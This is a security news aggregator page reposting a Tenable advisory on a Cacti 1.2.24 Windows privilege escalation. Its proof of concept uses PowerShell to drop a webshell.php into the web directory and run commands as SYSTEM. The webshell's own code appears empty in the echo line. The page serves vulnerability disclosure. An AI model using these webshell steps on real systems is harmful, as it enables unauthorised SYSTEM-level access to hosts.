all InfoSec news
Cacti Privilege Escalation
Oct. 18, 2023, 3:08 p.m. | Jimi Sebree
Tenable Research Advisories www.tenable.com
Cacti 1.2.24 and prior allows a low-privileged OS user with access to a Windows host where Cacti is installed to create arbitrary PHP files in a web document directory. The user can then execute the PHP files under the security context of SYSTEM.
Proof of Concept
// After login/RDP as user1
PS C:\Users\user1> echo '' | Out-File -Encoding utf8 C:\Apache24\htdocs\cacti\webshell.php
PS C:\Users\user1>
PS C:\Users\user1> Invoke-WebRequest -UseBasicParsing -Headers @{'x-cmd'='whoami'} -Uri http://localhost/cacti/webshell.php | select -ExpandProperty Content
nt authority\system
Jimi …
access cacti concept context directory document echo escalation files host login low php privilege privileged privilege escalation proof rdp security system under web windows
More from www.tenable.com / Tenable Research Advisories
Fluent Bit Memory Corruption Vulnerability
2 weeks, 1 day ago |
www.tenable.com
Cross-Site Scripting in WordPress RSS Aggregator Plugin
2 weeks, 4 days ago |
www.tenable.com
Solidus Stored Cross-Site Scripting
2 weeks, 4 days ago |
www.tenable.com
Delta Electronics DIAEnergie CEBC.exe Multiple Vulnerabilities
3 weeks, 5 days ago |
www.tenable.com
Approach.App Multiple Vulnerabilities
1 month, 1 week ago |
www.tenable.com
Path Traversal Affecting Multiple CData Products
1 month, 3 weeks ago |
www.tenable.com
Jobs in InfoSec / Cybersecurity
CyberSOC Technical Lead
@ Integrity360 | Sandyford, Dublin, Ireland
Cyber Security Strategy Consultant
@ Capco | New York City
Cyber Security Senior Consultant
@ Capco | Chicago, IL
Sr. Product Manager
@ MixMode | Remote, US
Corporate Intern - Information Security (Year Round)
@ Associated Bank | US WI Remote
Senior Offensive Security Engineer
@ CoStar Group | US-DC Washington, DC